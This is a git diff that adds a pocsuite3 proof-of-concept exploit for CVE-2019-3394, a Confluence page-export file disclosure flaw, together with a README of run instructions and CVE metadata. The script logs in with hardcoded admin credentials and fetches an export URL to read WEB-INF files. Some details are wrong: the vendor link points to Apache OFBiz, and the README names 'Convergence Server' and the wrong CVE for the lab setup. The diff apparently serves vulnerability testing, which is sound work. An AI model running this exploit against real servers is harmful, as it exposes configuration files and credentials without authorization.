diff --git a/cve/confluence/2019/CVE-2019-3394/CVE-2019-3394.py b/cve/confluence/2019/CVE-2019-3394/CVE-2019-3394.py
new file mode 100644
index 0000000000000000000000000000000000000000..15359862ec6ffa42fd53066ed1f1575f0004efdd
--- /dev/null
+++ b/cve/confluence/2019/CVE-2019-3394/CVE-2019-3394.py
@@ -0,0 +1,94 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+from urllib.parse import urlparse
+from pocsuite3.api import requests
+from pocsuite3.api import register_poc
+from pocsuite3.api import Output, POCBase, logger
+from pocsuite3.lib.utils import random_str
+import subprocess
+import base64
+
+
+class TestPOC(POCBase):
+    vulID = ''  # 留空即可
+    version = ''  # 留空即可
+    author = ''  # 留空即可
+    vulDate = ' '  # 漏洞公开的时间,不清楚的可留空
+    cveID = 'CVE-2019-3394'  # 该漏洞对应的CVE编号
+    createDate = ''  # 留空即可
+    updateDate = ''  # 留空即可
+    references = [  # 漏洞的参考链接，可保留空数组 “[]”
+        'https://github.com/jas502n/CVE-2019-3394'
+    ]
+    name = 'confluence路径穿越漏洞'  # POC 名称，支持单行文本
+    appPowerLink = 'https://ofbiz.apache.org/'  # 漏洞厂商主页地址
+    appName = 'confluence路径穿越漏洞'  # 漏洞应用名称
+    appVersion = '[6.1.0,6.6.16),[6.7.0,6.13.7),[6.14.0,6.15.8)'  # 漏洞影响的应用版本
+    vulType = '路径穿越'  # 漏洞类型,类型参见《漏洞类型规范表》
+    desc = '''                                # 漏洞简要描述，支持多行文本
+        Confluence Server 和 Confluence Data Center 中存在通过页面导出的本地文件泄露漏洞。具有页面编辑权限的攻击者可以利用此漏洞读取服务器上<install-directory>/confluence/WEB-INF目录下的任意文件，其中可能包含用于与其他服务集成的配置文件，可能泄露凭据或其他敏感信息。
+    solution=''漏洞解决方案'''  # 漏洞的简要解决方案
+    samples = []  # POC 测试样例（使用本POC可验证成功的漏洞站点URL）
+    install_requires = []  # POC 运行所需要的第三方 Python 模块，建议尽量不要使用第三方模块
+
+
+
+    def _verify(self):
+        result = {}
+        # 请在此处编写漏洞验证相关代码
+        pr = urlparse(self.url)
+        if pr.port:
+            ports = [pr.port]
+        else:
+            ports = [8090]
+        for port in ports:
+            target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
+            burp0_url = target+"/dologin.action"
+            burp0_cookies = {"JSESSIONID": "CA98C2FA809C3F581693A85FC56D8BFE"}
+            burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1",
+                             "Origin": "http://192.168.217.139:8090", "Content-Type": "application/x-www-form-urlencoded",
+                             "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36",
+                             "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+                             "Referer": "http://192.168.217.139:8090/dologin.action", "Accept-Encoding": "gzip, deflate",
+                             "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
+            burp0_data = {"os_username": "admin", "os_password": "admin123", "os_cookie": "true",
+                          "login": "\xe7\x99\xbb\xe5\xbd\x95", "os_destination": "/index.action"}
+
+            my_url = target+"/exportword?pageId=98379"
+            my_headers = {"Upgrade-Insecure-Requests": "1",
+                             "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36",
+                             "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+                             "Referer": "http://192.168.217.201:8090/display/TEST/test-3394",
+                             "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
+    #        requests.get(burp0_url, headers=burp0_headers, cookies=my_cookies)
+
+
+
+            try:
+                response = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data,allow_redirects=False)
+                my_cookies = requests.utils.dict_from_cookiejar(response.cookies)
+                print(my_cookies)
+                send_poc = requests.get(my_url,cookies=my_cookies, headers=my_headers, verify=False)
+
+                if send_poc.status_code == 200 and ('web-app xmlns' in send_poc.text and 'Confluence Web App' in send_poc.text):
+                    result['VerifyInfo'] = {}
+                    result['VerifyInfo']['URL'] = burp0_url
+
+            except:
+                logger.error(f"connect target '{target} failed!'")
+            return self.parse_output(result)
+
+    def _attack(self):
+        return self._verify()
+
+    def parse_output(self, result):
+        output = Output(self)
+        if result:
+            output.success(result)
+        else:
+            output.fail('Internet nothing returned')
+        return output
+
+
+register_poc(TestPOC)
diff --git a/cve/confluence/2019/CVE-2019-3394/README.md b/cve/confluence/2019/CVE-2019-3394/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..c0d24e870a3456fe89532d24a7ab1f389f5ac316
--- /dev/null
+++ b/cve/confluence/2019/CVE-2019-3394/README.md
@@ -0,0 +1,28 @@
+# CVE-2019-3394 Proof-of-Concept
+
+### Overview
+
+There is a local file disclosure vulnerability in the page export function of the Convergence Server and Data Center: a remote attacker with the "Add Page" space permission can read arbitrary files in the/confluence/WEB INF/directory. This directory may contain configuration files for integration with other services, and may disclose authentication credentials, such as LDAP authentication credentials or other sensitive information.
+For a comprehensive understanding, check out the accompanying [blog post](https://blog.csdn.net/zy15667076526/article/details/110721095) for in-depth details.
+
+### Dependencies
+
+* Python 3.6+
+* `pocsuite3` Python Library
+
+### Usage
+
+1. Verify `pocsuite3` is installed:
+```
+pip install pocsuite3
+```
+
+2. Prepare vulnerable server:
+```
+	The vulnerability configuration used in the recurrence process is from https://vulhub.org/#/environments/confluence/CVE-2019-3396/, refer to it to complete the environment construction. Then follow the prompts to create a sample website and administrator account.
+```	
+
+3. Run Poc:
+```
+	pocsuite -r CVE-2019-3394.py -u ip:port
+```
\ No newline at end of file
diff --git a/cve/confluence/2019/yaml/CVE-2019-3394.yaml b/cve/confluence/2019/yaml/CVE-2019-3394.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..b79454abc7916761e4f6dc18ed9c4711b1d46a2d
--- /dev/null
+++ b/cve/confluence/2019/yaml/CVE-2019-3394.yaml
@@ -0,0 +1,23 @@
+id: CVE-2019-3394
+source: 
+  none
+info:
+  name: Atlassian Confluence Server是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件，也可以用于构建企业WiKi。Confluence Data Center是Confluence Center的数据中心版本。
+  severity: high
+  description: |
+    Confluence Server 和 Data Center 在页面导出功能中存在本地文件泄露漏洞：具有“添加页面”空间权限的远程攻击者，能够读取 /confluence/WEB-INF/ 目录下的任意文件。 该目录可能包含用于与其他服务集成的配置文件，可能会泄漏认证凭据，例如 LDAP 认证凭据或其他敏感信息。
+  scope-of-influence:
+    6.1.0 <= version < 6.6.16
+    6.7.0 <= version < 6.13.7
+    6.14.0 <= version < 6.15.8
+  reference:
+    - https://confluence.atlassian.com/x/uAsvOg
+    - https://jira.atlassian.com/browse/CONFSERVER-58734
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2019-3394
+    cwe-id: CWE-22
+    cnvd-id: None
+    kve-id: None
+  tags: 任意文件读取
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 5a8b7367b6465e9d0e9c24f102c47dfafcf732cc..8ec6e5c2e71b9be100d9cf94fbf88373fccc0751 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -54,6 +54,7 @@ cve:
     - CVE-2022-2185
     - CVE-2022-2884
   confluence:
+    - CVE-2019-3394
     - CVE-2019-3396
     - CVE-2021-26084
     - CVE-2022-26134